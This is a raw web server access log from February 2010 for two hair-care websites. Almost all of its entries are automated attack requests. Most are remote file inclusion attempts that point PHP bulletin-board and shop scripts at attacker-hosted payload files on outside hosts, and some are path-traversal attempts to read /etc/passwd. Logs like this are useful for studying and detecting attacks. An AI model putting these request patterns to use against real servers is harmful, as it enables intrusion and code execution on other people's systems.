210.205.6.233 - - [07/Feb/2010:19:51:35 -0800] "GET ///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:51:35 -0800] "GET /logs////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:51:35 -0800] "GET /logs/access.log////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:51:56 -0800] "GET ///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:51:57 -0800] "GET /logs/access.log////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:51:57 -0800] "GET /logs////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:52:08 -0800] "GET /logs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:52:08 -0800] "GET /logs/access.log///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:52:09 -0800] "GET //delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
109.123.78.44 - - [07/Feb/2010:19:52:14 -0800] "GET /logs/access_100125.log/bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
109.123.78.44 - - [07/Feb/2010:19:52:14 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
109.123.78.44 - - [07/Feb/2010:19:52:14 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
210.205.6.233 - - [07/Feb/2010:19:52:45 -0800] "GET //delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:52:47 -0800] "GET /logs/access.log///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.205.6.233 - - [07/Feb/2010:19:52:47 -0800] "GET /logs///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:19:53:24 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:19:53:24 -0800] "GET /logs/access.log%20%20/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:19:53:24 -0800] "GET /logs/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [07/Feb/2010:19:53:38 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [07/Feb/2010:19:53:38 -0800] "GET /logs/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.231.3.136 - - [07/Feb/2010:19:54:09 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.231.3.136 - - [07/Feb/2010:19:54:09 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.231.3.136 - - [07/Feb/2010:19:54:10 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:19:55:55 -0800] "GET /logs/access_091123.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
84.33.199.19 - - [07/Feb/2010:19:55:55 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
84.33.199.19 - - [07/Feb/2010:19:55:55 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
83.149.110.210 - - [07/Feb/2010:19:57:13 -0800] "GET /logs/access.log/bbs/delete_comment.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:19:58:26 -0800] "GET /logs/access_091214.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:19:59:44 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:19:59:44 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:19:59:45 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:20:03:21 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:20:03:21 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:20:03:21 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [07/Feb/2010:20:09:37 -0800] "GET /logs/access_100118.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.149.110.210 - - [07/Feb/2010:20:10:01 -0800] "GET /logs/access.log%20%20/poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:10:01 -0800] "GET /poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:10:01 -0800] "GET /logs/poll_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:10:37 -0800] "GET //bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:10:37 -0800] "GET /logs/access.log%20%20///bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:10:37 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:10:52 -0800] "GET //bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:10:52 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:10:52 -0800] "GET /logs/access.log%20%20///bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [07/Feb/2010:20:10:58 -0800] "GET /logs/access_100118.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:13:50 -0800] "GET /logs/access.log%20%20///bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:13:50 -0800] "GET //bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:13:50 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:15:35 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:15:35 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:15:35 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:16:30 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:16:30 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:16:33 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
84.33.199.19 - - [07/Feb/2010:20:16:38 -0800] "GET /bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:20:16:38 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:20:16:38 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:20:20:08 -0800] "GET /bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.33.199.19 - - [07/Feb/2010:20:20:08 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.33.199.19 - - [07/Feb/2010:20:20:11 -0800] "GET /logs/access_100125.log%20%20//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:20:27 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:20:27 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:20:27 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:21:12 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:21:16 -0800] "GET /logs/access_100125.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:21:16 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.213 - - [07/Feb/2010:20:23:06 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [07/Feb/2010:20:23:18 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2070 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:30:19 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:30:19 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:30:21 -0800] "GET /logs/access.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:20:31:33 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.33.199.19 - - [07/Feb/2010:20:31:46 -0800] "GET /logs/access_100125.log//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:33:26 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:33:26 -0800] "GET /logs/access.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:33:26 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:33:31 -0800] "GET /write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.149.110.210 - - [07/Feb/2010:20:33:31 -0800] "GET /logs/access_100125.log%20%20/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.149.110.210 - - [07/Feb/2010:20:33:31 -0800] "GET /logs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.149.110.210 - - [07/Feb/2010:20:34:21 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:34:21 -0800] "GET /write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:34:21 -0800] "GET /logs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:34:22 -0800] "GET /logs/access.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:34:22 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:34:22 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:35:14 -0800] "GET /logs/access_100125.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:35:14 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:35:14 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:36:02 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:36:02 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [07/Feb/2010:20:36:14 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:36:14 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [07/Feb/2010:20:36:28 -0800] "GET /logs/access_100125.log%20%20//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:37:44 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:37:44 -0800] "GET /logs/access_100125.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:37:44 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:38:05 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:05 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:05 -0800] "GET /logs/access.log%20%20///bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:21 -0800] "GET /logs/access.log%20%20///bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:21 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:21 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:36 -0800] "GET //bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:36 -0800] "GET /logs/access.log%20%20///bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [07/Feb/2010:20:38:36 -0800] "GET /logs///bbs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [07/Feb/2010:20:38:52 -0800] "GET /logs/access.log/bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [07/Feb/2010:20:38:52 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [07/Feb/2010:20:38:52 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:39:00 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
83.149.110.210 - - [07/Feb/2010:20:39:05 -0800] "GET /logs/access_100125.log/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:39:07 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.230.162.220 - - [07/Feb/2010:20:39:07 -0800] "GET /logs/access_100125.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
